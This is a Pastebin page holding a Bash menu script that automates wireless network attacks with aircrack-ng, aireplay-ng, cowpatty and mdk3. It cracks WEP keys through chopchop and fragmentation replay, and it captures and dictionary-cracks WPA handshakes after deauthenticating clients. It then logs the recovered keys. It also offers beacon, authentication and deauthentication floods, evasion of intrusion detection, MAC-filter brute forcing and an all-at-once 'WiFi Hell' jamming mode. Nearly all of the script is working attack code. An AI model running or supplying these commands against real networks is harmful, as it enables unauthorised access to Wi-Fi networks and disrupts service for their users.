API tools faq
paste
Guest User

Untitled

a guest
Jul 2nd, 2011
105
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 14.60 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. MYMAC=06:15:AF:67:96:24
  3. #MYMAC=`ifconfig ath0 | awk /HW/'{print $5}'`
  4. File=/tmp/.HOSTADD
  5. {
  6. read HOSTADD
  7. } < $File
  8. File=/tmp/.APNAME
  9. {
  10. read APNAME
  11. } < $File
  12. File=/tmp/.APADD
  13. {
  14. read APADD
  15. } < $File
  16. File=/tmp/.CHAN
  17. {
  18. read CHAN
  19. } < $File
  20. clear
  21. function showMenu
  22. {
  23.     echo ""
  24.     echo -n "Press enter to continue..."
  25.     read
  26.     clear
  27.     mainMenu
  28. }
  29. function Enter
  30. {
  31.     echo ""
  32.     echo -n "Press enter to continue..."
  33.     read
  34.     clear
  35. }
  36. function Details
  37. {
  38. echo "Host MAC: "$HOSTADD
  39. echo "Access point MAC: "$APADD
  40. echo "Access point name: "$APNAME
  41. echo "Channel: "$CHAN
  42. }
  43. function showAP
  44. {
  45. ap_array=`cat ~/dump-01.txt | grep -a -n Station | awk -F : '{print $1}'`
  46. head -n $ap_array ~/dump-01.txt &> ~/dump-02.txt
  47. clear
  48. echo ""
  49. echo "           MAC            CHAN    SECU    POWER   #CHAR   SSID"
  50. echo "========================================================================"
  51. while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
  52.  longueur=${#MAC}
  53.    if [ $longueur -ge 17 ]; then
  54.     echo -e "    "$MAC"\t""|"$CHANNEL"\t""|"$PRIVACY"\t""|"$POWER"\t""|"$IDLENGTH"\t""|"$ESSID
  55.     aidlenght=$IDLENGTH
  56.     assid[$i]=$ESSID
  57.     achannel[$i]=$CHANNEL
  58.     amac[$i]=$MAC
  59.     aprivacy[$i]=$PRIVACY
  60.    fi
  61. done < ~/dump-02.txt
  62. }
  63.  
  64. mainMenu () {
  65. clear
  66. echo "Stage 1. Put card in correct mode"
  67. echo "Stage 2. Scan for access points and hosts"
  68. echo "Stage 3. Specify access point"
  69. echo "Stage 4. Authenticate client with access point"
  70. echo "Stage 5. Attacks and packet creation"
  71. echo "Stage 6. Capture ARP packet"
  72. echo "Stage 7. Crack WEP key"
  73. echo "Stage 8. Clean up files"
  74. echo "Stage 9. Other options"
  75. echo "Stage 10. Exit"
  76. echo
  77. echo -n "What stage are you at? "
  78. }
  79. while [ 1 ]
  80. do
  81. mainMenu
  82. read STAGE
  83. case "$STAGE" in
  84.  
  85. "1")
  86. clear
  87. echo "1. Monitor mode"
  88. echo "2. Managed mode"
  89. echo "3. Back"
  90. echo -n "Please select a mode: "
  91. read MODE
  92. if [ $MODE == 1 ]; then
  93.     ifconfig ath0 down
  94.     wlanconfig ath0 destroy
  95.     wlanconfig ath0 create wlandev wifi0 wlanmode monitor -bssid
  96.     ifconfig ath0 up
  97.     showMenu
  98.     clear
  99. elif [ $MODE == 2 ]; then
  100.     ifconfig ath0 down
  101.     wlanconfig ath0 destroy
  102.     wlanconfig ath0 create wlandev wifi0 wlanmode managed -bssid
  103.     ifconfig ath0 up
  104.     showMenu
  105.     clear
  106. elif [ $MODE == 3 ]; then
  107.     mainMenu
  108.     clear
  109.     else
  110.     echo "no option selected"
  111.     showMenu
  112. fi
  113. ;;
  114.  
  115. "2")
  116. clear
  117. #Stronger signals can be achieved by specifying a channel.
  118. echo "For a range of channels type 1-14"
  119. echo
  120. echo -n "What channel(s) do you want to scan? "
  121. read CHANNEL
  122. airodump-ng -c $CHANNEL -w ~/dump ath0
  123. showMenu
  124. clear
  125. ;;
  126.  
  127. "3")
  128. showAP
  129. echo
  130. echo -n "specify access point MAC address: "
  131. read APADD
  132. echo -n "specify the name of the access point: "
  133. read APNAME
  134. echo -n "specify host address, this MAC is ($MYMAC): "
  135. read HOSTADD
  136. echo -n "specify channel: "
  137. read CHAN
  138. echo "Locking channel..."
  139. airmon-ng stop ath0
  140. airmon-ng start wifi0 $CHAN
  141. echo $CHAN > /tmp/.CHAN
  142. echo $HOSTADD > /tmp/.HOSTADD
  143. echo $APNAME > /tmp/.APNAME
  144. echo $APADD > /tmp/.APADD
  145. clear
  146. ;;
  147.  
  148. "4")
  149. clear
  150. echo "1. Constant (keepalive packets sent)"
  151. echo "2. Single (just a single authentication)"
  152. echo "3. Back"
  153. echo -n "Which type of authentication would you like to take place? "
  154. read CALM
  155. if [ $CALM = 1 ]; then
  156.     clear
  157.     Details
  158.     echo
  159.     echo "Associating you with the specified AP"
  160.     aireplay-ng -1 6000 -o 6 -q 10 -e $APNAME -a $APADD -h $HOSTADD ath0
  161.     showMenu
  162.     clear
  163. elif [ $CALM = 2 ]; then
  164.     clear
  165.     Details
  166.     echo
  167.     echo "Associating you with the specified AP - Do not close this until attack has finished"
  168.     aireplay-ng -1 0 -e $APNAME -a $APADD -h $HOSTADD ath0
  169.     showMenu
  170.     clear
  171. elif [ $CALM == 3 ]; then
  172.     clear
  173.     showMenu
  174.     else
  175.     clear
  176.     echo "no option selected"
  177.     showMenu
  178. fi
  179. ;;
  180.  
  181. "5")
  182. clear
  183. echo "1. Chopchop attack"
  184. echo "2. Fragmentation attack"
  185. echo "3. Back"
  186. echo -n "Specify an attack: "
  187. read ATTACK
  188. if [ $ATTACK = 1 ]; then
  189.     clear
  190.     Details
  191.     echo
  192.     echo -n "Specify minimum packet size (0 for any): "
  193.     read MIN
  194.     echo -n "Enter maximum packet size (Smaller size means faster cracking): "
  195.     read MAX
  196.     echo
  197.     echo "Launching chop chop attack"
  198.     aireplay-ng -4 -m $MIN -n $MAX -h $HOSTADD -b $APADD ath0
  199.     packetforge-ng -0 -a $APADD -h $HOSTADD -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request
  200.     aireplay-ng -2 -r arp-request ath0
  201.     showMenu
  202.     clear
  203.     #Same syntax, just launches fragment attack instead.
  204. elif [ $ATTACK = 2 ]; then
  205.     clear
  206.     #go to function details
  207.     Details
  208.     echo
  209.     echo -n "Specify minimum packet size (0 for any): "
  210.     read MIN
  211.     echo -n "Enter maximum packet size (Smaller size means faster cracking): "
  212.     read MAX
  213.     echo
  214.     echo "Launching fragmentation attack"
  215.     aireplay-ng -5 -m $MIN -n $MAX -b $APADD -h $HOSTADD ath0
  216.     packetforge-ng -0 -a $APADD -h $HOSTADD -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request
  217.     aireplay-ng -2 -r arp-request ath0
  218.     showMenu
  219.     clear
  220. elif [ $ATTACK == 3 ]; then
  221.     mainMenu
  222.     else
  223.     echo "no option selected"
  224. fi
  225. ;;
  226.  
  227. "6")
  228. Details
  229. echo
  230. echo "Capturing the arp packet"
  231. airodump-ng -c $CHAN --bssid $APADD -w capture ath0
  232. showMenu
  233. clear
  234. ;;
  235.  
  236. "7")
  237. aircrack-ng -z -b $APADD capture*.cap | tee raw.file
  238. Enter
  239. tail -4 raw.file | awk '{ print $4; }' | tr -d : > ap.key
  240. KEY=`cat ap.key`
  241. hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  242. echo "Name: "$APNAME >> ~/cracked.txt
  243. echo "MAC: "$APADD >> ~/cracked.txt
  244. echo "WEP Key: "$KEY >> ~/cracked.txt
  245. echo >> ~/cracked.txt
  246. rm ap.key
  247. rm raw.file
  248. clear
  249. echo "Name: "$APNAME
  250. echo "MAC: "$APADD
  251. echo "WEP Key: "$KEY
  252. showMenu
  253. clear
  254. ;;
  255.  
  256. "8")
  257. rm -v *.xor
  258. rm -v .XO-lock
  259. rm -v /tmp/.X0-lock
  260. rm -v arp-*
  261. rm -v psk*
  262. rm -v capture*
  263. rm -v /tmp/.HOSTADD
  264. rm -v /tmp/.APNAME
  265. rm -v /tmp/.APADD
  266. rm -v /tmp/.CHAN
  267. rm -v *.cap
  268. #rm -v ~dump*
  269. rm -v ~/dump*
  270. rm -iv ~/*.hash
  271. showMenu
  272. clear
  273. ;;
  274.  
  275. "9")
  276. clear
  277. echo "1. Crack WPA"
  278. echo "2. Run MDK3 attacks"
  279. echo "3. Spoof/restore MAC address"
  280. echo "4. Back"
  281. echo
  282. echo -n "What do you want to do? "
  283. read ADVANCED
  284.  
  285. #WPA
  286.     if [ $ADVANCED == 1 ]; then
  287.         clear
  288.         echo "1. Sniff key for 4-way handshake (top right)"
  289.         echo "2. Deauthentify connected clients"
  290.         echo "3. Run standard dictionary attack"
  291.         echo "4. Use cowpatty to generate a hash file and brute force the key (quicker)"
  292.         echo "5. Back"
  293.         echo
  294.         echo "A connected client will be needed to pick up the handshake."
  295.         echo -n "Select a step: "
  296.         read STEP
  297.         if [ $STEP == 1 ]; then  
  298.             airodump-ng -c $CHAN --bssid $APADD -w psk ath0
  299.             showMenu
  300.        
  301.         elif [ $STEP == 2 ]; then
  302.             clear
  303.             echo -n "Specify a MAC to deauth: "
  304.             read DEAUTH
  305.             echo -n "How many deauthentication packets do you want to send? "
  306.             read PACKETS
  307.             aireplay-ng -0 $PACKETS -e $APNAME -a $APADD -c $DEAUTH ath0
  308.             echo
  309.        
  310.         elif [ $STEP == 3 ]; then
  311.             echo -n "Type in the location of your dictionary:  "
  312.             read DICTLOCATE
  313.             aircrack-ng -a 2 -w "$DICTLOCTE" -b $APADD psk*.cap | tee raw.file
  314.             Enter          
  315.             tail -4 raw.file | awk '{ print $4; }' | tr -d : > ap.key
  316.             KEY=`cat ap.key`
  317.             hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  318.             echo "Name: "$APNAME >> ~/cracked.txt
  319.             echo "MAC: "$APADD >> ~/cracked.txt
  320.             echo "WPA Phrase: "$KEY >> ~/cracked.txt
  321.             echo >> ~/cracked.txt
  322.             rm ap.key
  323.             rm raw.file
  324.             clear
  325.             echo "Name: "$APNAME
  326.             echo "MAC: "$APADD
  327.             echo "WPA Passphrase: "$KEY
  328.             mainMenu
  329.             clear
  330.            
  331.         elif [ $STEP == 4 ]; then
  332.             clear
  333.             echo -n "Do you have a hash file for $APNAME? "
  334.             read HASH
  335.                 if [ $HASH = y ]; then
  336.                     echo -n "Type hash file location: "
  337.                     read HASHLOCATE
  338.                     cowpatty -v -r psk*.cap -d $HASHLOCATE -s "$APNAME" >> raw.file
  339.                     tail -3 raw.file | grep PSK | awk '{ print $4; }' | tr -d .'"' > ap.key
  340.                     KEY=`cat ap.key`
  341.                     hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  342.                     echo "Name: "$APNAME >> ~/cracked.txt
  343.                     echo "MAC: "$APADD >> ~/cracked.txt
  344.                     echo "WPA Key: "$KEY >> ~/cracked.txt
  345.                     echo >> ~/cracked.txt
  346.                     rm ap.key
  347.                     rm raw.file
  348.                     clear
  349.                     Enter
  350.                     echo "Name: "$APNAME
  351.                     echo "MAC: "$APADD
  352.                     echo "WPA Passphrase: "$KEY
  353.                     mainMenu
  354.                     clear
  355.        
  356.                 elif [ $HASH = n ]; then
  357.                     echo "A dictionary file will be needed."
  358.                     echo -n "Type in the location of your dictionary: "
  359.                     read DICTLOCATE
  360.                     echo "Generating hash file, this could take some time..."
  361.                     genpmk -v -f $DICTLOCATE -d $APNAME.hash -s "$APNAME"
  362.                     Enter
  363.                     echo
  364.                     echo
  365.                     echo "The has file has now been generated, running attack using hash file."
  366.                     cowpatty -v -r psk*.cap -d $APNAME.hash -s $APNAME >> raw.file
  367.                     tail -3 raw.file | grep PSK | awk '{ print $4; }' | tr -d .'"' > ap.key
  368.                     KEY=`cat ap.key`
  369.                     hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  370.                     echo "Name: "$APNAME >> ~/cracked.txt
  371.                     echo "MAC: "$APADD >> ~/cracked.txt
  372.                     echo "WPA Key: "$KEY >> ~/cracked.txt
  373.                     echo >> ~cracked.txt
  374.                     rm ap.key
  375.                     rm raw.file
  376.                     clear
  377.                     Enter
  378.                     echo "Name: "$APNAME
  379.                     echo "MAC: "$APADD
  380.                     echo "WPA Passphrase: "$KEY
  381.                     mainMenu
  382.                     clear
  383.                 else
  384.                     echo "...no option selected"
  385.                     clear
  386.                     mainMenu
  387.                 fi
  388.        
  389.         elif [ $STEP == 5 ]; then
  390.             mainMenu
  391.             clear
  392.         else
  393.             echo "...no option selected"
  394.             sleep 3
  395.             clear
  396.         fi
  397.  
  398.     #MDK3
  399.     elif [ $ADVANCED == 2 ]; then
  400.         mdk3men
  401.         clear
  402.         mdk3men () {
  403.         echo "1. Specify details"
  404.         echo "2. Beacon flood"
  405.         echo "3. Authentication flooding"
  406.         echo "4. Deauthentication mode (amok mode)"
  407.         echo "5. Cancel all traffic continuesly"
  408.         echo "6. Standard packet flooding"
  409.         echo "7. Cause IDS systems to recognise access points as rogues"
  410.         echo "8. MAC bruteforce attack on access points implementing filtering"
  411.         echo "9. Retrieve an SSID"
  412.         echo "10. 'WiFi Hell' - attacks 2-5 simultaneously"
  413.         echo "11. Back"
  414.         echo
  415.         echo -n "What would you like do? "
  416.                 }
  417.         while [ 1 ]
  418.             do
  419.             mdk3men
  420.             read MDKCHOICE
  421.             case "$MDKCHOICE" in
  422.  
  423.     "1")
  424.     showAP
  425.     echo
  426.     echo "If any of the following is unknown just press enter"
  427.     echo
  428.     echo -n "What is the MAC address of the access point: "
  429.     read ESID
  430.     echo -n "What is the name of the access point: "
  431.     read SSID
  432.     echo -n "What channel do you want to use? "
  433.     read CH
  434.     echo -n "Do you want to put your card in attack mode? "
  435.     read ANSWER
  436.         if [ $ANSWER = y ]; then     
  437.             echo "putting WiFi card in correct mode"
  438.             ifconfig ath0 down
  439.             wlanconfig ath0 destroy
  440.             wlanconfig ath0 create wlandev wifi0 wlanmode monitor
  441.             sleep 1
  442.             iwconfig ath0 channel 1 rate 1M
  443.             mdk3men
  444.             clear
  445.         elif [ $ANSWER = n ]; then
  446.             mdk3men
  447.             clear
  448.         else
  449.             echo "...no option selected"
  450.             sleep 3
  451.             clear
  452.         fi
  453.             ;;
  454.  
  455.     "2")
  456.     clear
  457.     echo -n "Create fake access points... "
  458.     sleep 2
  459.     clear
  460.     echo "Press enter to skip questions..."
  461.     echo -n "Access point name (enter for random): "
  462.         read NAME
  463.         NAME="-n $NAME"
  464.     echo -n "Access point channel (enter for random): "
  465.         read ATTACKCHANNEL
  466.         ATTACKCHANNEL="-h -c $ATTACKCHANNEL"
  467.     mdk3 ath0 b -g $ATTACKCHANNEL $NAME
  468.     clear
  469.     ;;
  470.  
  471.     "3")
  472.     clear
  473.     echo "Sends fake authentication frames to "$SSID
  474.     sleep 2
  475.     mdk3 ath0 a -i $ESID
  476.     clear
  477.     ;;
  478.  
  479.     "4")
  480.     clear
  481.     echo "Deauthentify traffic from channel specified"
  482.     echo -n "What channel(s) would you like to disassociate? "
  483.     read CH
  484.     sleep 2
  485.     mdk3 ath0 d -c $CH
  486.     break
  487.     clear
  488.     ;;
  489.  
  490.     "5")
  491.     clear
  492.     echo "Cancel all traffic on "$SSID
  493.     sleep 2
  494.     mdk3 ath0 m -w 5 -t $ESID
  495.     clear
  496.     ;;
  497.  
  498.     "6")
  499.     clear
  500.     echo "Flooding packets on "$SSID
  501.     sleep 2
  502.     mdk3 ath0 x 0 -n $SSID -t $ESID
  503.     clear
  504.     ;;
  505.  
  506.     "7")
  507.     clear
  508.     echo "IDS's will identify $SSID as a rogue access point"
  509.     sleep 2
  510.     mdk3 ath0 w -e $SSID
  511.     clear
  512.     ;;
  513.  
  514.     "8")
  515.     clear
  516.     echo "Brute force allowed MAC to bypass MAC filtering" $SSID
  517.     sleep 2
  518.     mdk3 ath0 f -t $ESID
  519.     sleep 5
  520.     clear
  521.     mdk3men
  522.     ;;
  523.  
  524.     "9")
  525.     clear
  526.     echo "Brute forcing the SSID, use this attack to find a hidden access point name"
  527.     echo "(It may be quicker to observe and deauth connected clients)"
  528.     sleep 3
  529.     echo -n "Type dictionary location: "
  530.     read WORDS
  531.     mdk3 ath0 p -c $CH -t $ESID -f $WORDS
  532.     clear
  533.     ;;
  534.  
  535.     "10")
  536.     clear
  537.     echo "WARNING"
  538.     echo "======="
  539.     echo "This has the potential to cause damage to a lot of networks..."
  540.     echo
  541.     echo -n "Press enter if your sure you want to do this..."
  542.     read
  543.     clear
  544.     echo "1. The beacon flood will prevent people from recognising the correct AP."
  545.     echo "2. Authentication flood will prevent the access point from recognising real clients."
  546.     echo "3. Deauthentication flood will kill all clients (if any connect)."
  547.     echo "4. IDS confusion mode will cross-connect kicked clients to real and fake APs."
  548.     echo
  549.     echo "Launching in 3 seconds"
  550.     sleep 3
  551.  
  552.     function beacon {
  553.     xterm $HOLD $TOPRIGHT -geometry 62x15 -title "Beacon flood" -hold -e mdk3 ath0 b -n $SSID -c $CH
  554.     }
  555.  
  556.     function authflood {
  557.     xterm $HOLD $TOPLEFT -geometry 62x15 -title "Authentication flood" -hold -e mdk3 ath0 a -i $ESID
  558.     }
  559.  
  560.     function deauthflood {
  561.     xterm $HOLD $BOTTOMRIGHT -geometry 62x15 -title "Deauthentication flood" -hold -e mdk3 ath0 d -c $CH
  562.     }
  563.     function confusion {
  564.     xterm $HOLD $BOTTOMLEFT -geometry 62x15 -title "IDS confusion" -hold -e mdk3 ath0 w -e $SSID -c$CH
  565.     }
  566.  
  567.     authflood & beacon & deauthflood & confusion
  568.     clear
  569.     ;;
  570.  
  571.     11)
  572.     break
  573.     ;;
  574.  
  575.     *)
  576.     clear
  577.     echo "no option selected"
  578.     mdk3men
  579.     ;;
  580.  
  581.         esac
  582.         done
  583.  
  584.     elif [ $ADVANCED == 3 ]; then
  585.         clear
  586.         echo "1. Spoof a MAC"
  587.         echo "2. Restore MAC"
  588.         echo "3. Back"
  589.         echo
  590.         echo -n "Please select an option: "
  591.         read MACOPT
  592.             if [ $MACOPT == 1 ]; then
  593.                 echo -n "Type new MAC address (syntax is FF:FF:FF:FF:FF:FF): "
  594.                 read MACSPOOF
  595.                 ifconfig ath0 down
  596.                 ifconfig wifi0 down
  597.                 echo "ath0"
  598.                 macchanger -m $MACSPOOF ath0
  599.                 echo "wifi0"
  600.                 macchanger -m $MACSPOOF wifi0
  601.                 sleep 3
  602.                 ifconfig wifi0 up
  603.                 ifconfig ath0 up
  604.                 mainMenu
  605.             elif [ $MACOPT == 2 ]; then
  606.                 #this mac = $MYMAC
  607.                 ifconfig ath0 down
  608.                 ifconfig wifi0 down
  609.                 echo "ath0"
  610.                 macchanger -m $MYMAC ath0
  611.                 echo "wifi0"
  612.                 macchanger -m $MYMAC wifi0
  613.                 sleep 3
  614.                 ifconfig ath0 up
  615.                 ifconfig wifi0 up
  616.                 mainMenu
  617.             elif [ $MACOPT == 3 ]; then
  618.                 mainMenu
  619.             else
  620.                 echo "no option selected"
  621.             fi
  622.     elif [ $ADVANCED == 4 ]; then
  623.         mainMenu
  624.         clear
  625.     else
  626.         echo "no option selected"
  627. fi
  628. ;;
  629.  
  630. "10")
  631. echo -n "Return card to managed mode? "
  632. read MODE
  633.     if [ $MODE == y ]; then
  634.         sleep 2
  635.         ifconfig ath0 down
  636.         wlanconfig ath0 destroy
  637.         wlanconfig ath0 create wlandev wifi0 wlanmode managed -bssid
  638.         ifconfig ath0 up
  639.         clear
  640.         exit
  641.     elif [ $MODE == n ]; then
  642.         clear
  643.         exit
  644.     else
  645.         echo "no option selected"
  646.     fi
  647.     ;;
  648.  
  649. *)
  650. echo "no option selected"
  651. showMenu
  652. ;;
  653.  
  654. esac
  655. done
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!